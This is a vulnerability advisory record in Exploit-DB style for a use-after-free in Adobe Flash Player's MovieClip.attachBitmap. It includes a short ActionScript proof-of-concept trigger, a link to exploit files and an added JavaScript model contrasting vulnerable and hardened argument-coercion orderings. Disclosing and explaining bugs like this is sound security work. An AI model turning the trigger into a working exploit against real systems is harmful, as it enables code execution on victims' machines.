Vendor: Flash Player
By:
CVSS: 7.5 (HIGH)
CWE: 416 (Use-after-free)
Product Name: Flash Player
Affected Version From: Adobe Flash Player
Affected Version To:
Patch Exists: NO
Related CWE:
CPE: a:adobe:flash_player
Metasploit:
Other Scripts:
Platforms Tested:

Use-after-free vulnerability in MovieClip.attachBitmap

The MovieClip.attachBitmap method in Adobe Flash Player contains a use-after-free vulnerability. When the depth parameter is an object with a valueOf method defined, that valueOf call can free the MovieClip while attachBitmap is still running; attachBitmap then uses the freed MovieClip, leading to potential code execution or a crash.

Mitigation:

Adobe Flash Player is no longer supported and has reached end-of-life. It is recommended to uninstall Flash Player and use alternative technologies.

Exploit-DB raw data:

Source: https://code.google.com/p/google-security-research/issues/detail?id=593

There is a use-after-free in MovieClip.attachBitmap. If the depth parameter is an object with valueOf defined, this method can free the MovieClip, which is then used.

A minimal PoC follows:

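this.createEmptyMovieClip("mc", 1);
var b = new flash.display.BitmapData(100, 100, true, 0x77777777);
// depth is passed as an object, so attachBitmap calls its valueOf to obtain a number
mc.attachBitmap(b, {valueOf: func});

function func() {
    // Frees mc while attachBitmap is still executing
    mc.removeMovieClip();

    // Fix heap here

    return 5;
}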

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39040.zip
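
The bug class described above, as an added JavaScript model that is not Flash Player code and not part of the original report: a native-style method that captures its target before coercing a script-controlled argument, next to an ordering that coerces first and re-validates afterwards. ClipTable, attachBitmapVulnerable, attachBitmapHardened and runScenario are hypothetical names, and the hardened ordering is a common mitigation for this pattern, not Adobe's actual patch.

```javascript
// Model of a player-side object table. "freed" marks a clip that script has
// removed; in native code that memory could already be reused.
class ClipTable {
  constructor() { this.clips = new Map(); this.nextId = 1; }
  create(name) {
    const id = this.nextId++;
    this.clips.set(id, { name, freed: false, bitmaps: {} });
    return id;
  }
  remove(id) {                        // models removeMovieClip()
    const clip = this.clips.get(id);
    if (clip) { clip.freed = true; this.clips.delete(id); }
  }
}

// Vulnerable ordering: target reference is captured, then script runs.
function attachBitmapVulnerable(table, clipId, bitmap, depth) {
  const target = table.clips.get(clipId);
  if (!target) return { attached: false, touchedFreed: false };
  const d = Number(depth);            // invokes depth.valueOf() if depth is an object
  target.bitmaps[d] = bitmap;         // write through a possibly stale reference
  return { attached: true, touchedFreed: target.freed };
}

// Hardened ordering: all coercions finish before the target is looked up,
// and the lookup result is validated before any use.
function attachBitmapHardened(table, clipId, bitmap, depth) {
  const d = Number(depth);            // script callbacks run here, before lookup
  if (!Number.isInteger(d)) return { attached: false, touchedFreed: false };
  const target = table.clips.get(clipId);
  if (!target || target.freed) return { attached: false, touchedFreed: false };
  target.bitmaps[d] = bitmap;
  return { attached: true, touchedFreed: false };
}

// Constructed input with the same shape as the PoC: when hostile is true,
// depth is an object whose valueOf removes the clip and returns 5.
function runScenario(attach, hostile) {
  const table = new ClipTable();
  const mc = table.create("mc");
  const depth = hostile ? { valueOf() { table.remove(mc); return 5; } } : 5;
  return attach(table, mc, "bitmap", depth);
}
```

The touchedFreed flag is the model's stand-in for the memory-safety violation: it is true only when a write lands on a clip that was removed during argument coercion.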